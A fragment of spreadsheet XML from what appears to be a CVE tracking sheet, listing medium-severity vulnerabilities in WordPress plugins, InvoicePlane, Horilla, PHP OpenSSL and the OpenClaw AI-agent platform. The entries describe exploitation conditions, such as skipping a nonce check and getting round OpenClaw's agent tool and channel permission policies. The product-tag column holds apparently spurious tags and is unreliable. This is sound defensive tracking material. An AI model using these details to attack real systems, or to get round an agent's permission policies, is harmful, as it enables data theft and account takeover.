      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100531</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100538</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 does not apply the originating sender's global or per-agent toolsBySender policy when handling outbound attachments. A sender that has been explicitly denied filesystem read tools can still cause a known local file to be read and returned via a final-response media directive or a message attachment, disclosing local file contents to an admitted requester whose agent turn did not include the read tool. Exploitation requires knowledge or derivation of a useful host path and a delivery flow that accepts local attachments. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100538</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100582</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>react, go, gin, rust</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>OpenClaw channel plugins (@openclaw/msteams, @openclaw/feishu, @openclaw/matrix, and @openclaw/googlechat) before 2026.8.1 do not enforce the configured channel read allowlist for caller-supplied explicit read targets in message, reaction, pin, member, and related metadata read actions. A lower-trust sender or a steered agent with access to a channel read action can therefore retrieve content or metadata from channels or rooms excluded by the operator's read policy; the practical impact depends on the permissions held by the connected bot account. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100582</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63432</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>django, go</t>
        </is>
      </c>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. From 1.0.0 until 1.6.0 and 2.0.0, the get_mail_preview handlers in recruitment/views/actions.py and employee/not_in_out_dashboard.py render a user-controlled body at /recruitment/get-mail-preview/ and /employee/get-employee-mail-preview with the full request object in the Django template context. An authenticated user with a valid CSRF token can use template attribute traversal to read request.user.password, request.META, and related-user attributes, exposing password hashes, personal data, and server request metadata. Django template restrictions prevent arbitrary code execution through this primitive, so the demonstrated impact is information disclosure and possible offline password cracking or account compromise. This issue is fixed in versions 1.6.0 and 2.0.0.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63432</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85274</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane exposes Recurring::stop() as a state-changing GET route without CSRF token validation. When an authenticated administrator loads attacker-controlled content that requests /invoices/recurring/stop/{id}, the application stops the selected recurring invoice. An attacker can target multiple identifiers to interrupt recurring billing and cause financial loss. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85274</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85289</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane omits ensure_valid_post_request() from delete methods including Payments::delete(), Recurring::delete(), and User_clients::delete(). Although the routes require POST, they do not validate the request's CSRF token. An attacker can submit a cross-origin form through an authenticated administrator's browser to delete financial records and other application data. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85289</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85291</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Users::change_password() method accepts a user_id from the URL and updates that account's password without an object-level authorization check. An authenticated secondary administrator can target the primary administrator account and replace its password without knowing the current password. The attacker can then take over the primary account and access its data and privileges. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85291</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91767</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>openssl, php, hp</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>php_openssl_matches_wildcard_name() in ext/openssl/xp_ssl.c underflows the length argument passed to memchr() when a TLS server certificate presents a wildcard name whose literal characters are together longer than the hostname being verified. A malicious server presenting such a certificate makes the PHP client read up to SIZE_MAX bytes past the end of a heap allocation. The path is reachable from any default client stream, because verify_peer_name is enabled by default.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91767</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93899</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>The Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress is vulnerable to generic SQL Injection via 'group_id' Message Meta Parameter in all versions up to, and including, 3.0.4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 Exploitation requires the BuddyBoss Platform plugin to be installed with its Social Groups component disabled, a state that persists on any site that has previously toggled the Groups component off since BuddyBoss does not drop the wp_bp_groups table upon deactivation.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93899</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100529</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization scope widening vulnerability in file-transfer allow-always approvals that allows attackers to reuse standing grants for unreviewed paths. Attackers can exploit glob metacharacter interpretation and node display name reuse to access sibling paths or different nodes beyond the operator's original approval scope.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100529</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100546</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) versions &gt;= 2026.7.2 and &lt; 2026.9.2 contain a race condition in the Discord realtime voice transcript path. Concurrent control-classified voice transcripts could consume speaker context belonging to another participant after an asynchronous control check, causing a transcript to inherit another speaker's owner status. In Discord agent-proxy voice sessions using the affected realtime control path, an utterance from a non-owner participant could reach the downstream agent boundary marked as owner, so owner-sensitive behavior is applied to the wrong speaker. Exploitation depends on concurrent transcript timing and on the tools and commands available to the affected agent. The issue is fixed in 2026.9.2; as a workaround, disable Discord realtime voice for agents that distinguish owner and non-owner senders.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100546</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13179</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>The WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shapes_values Parameter in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The fc-call-nonce nonce required by the endpoint is exposed to all frontend visitors who view a map page via window.wpgmp_local.nonce, enabling any authenticated subscriber to read the nonce and craft a valid request; additionally, the secondary _wpnonce check in the drawing handler can be bypassed by simply omitting the _wpnonce parameter from the request.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13179</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15273</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>The Automatic.css plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REQUEST_URI in all version 4.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever an administrator accesses the Activity Log settings page.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15273</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92746</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse – WordPress Blocks, Page Builder &amp; Site Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Post Comment Block 'suffixMain' Attribute in all versions up to, and including, 4.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. WordPress core wp_kses_post sanitization does not mitigate this vulnerability because the payload is stored inside a Gutenberg block delimiter comment rather than as a raw HTML tag, and is only rendered as exploitable HTML at the PHP render stage.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92746</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93656</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Avatar Field in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is exploitable via a nonce-free GET request to /wp-admin/profile.php, requiring no profile-form submission; a Subscriber can plant the malicious attachment URL, which then executes when an administrator opens that user's Edit User screen.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93656</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93747</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
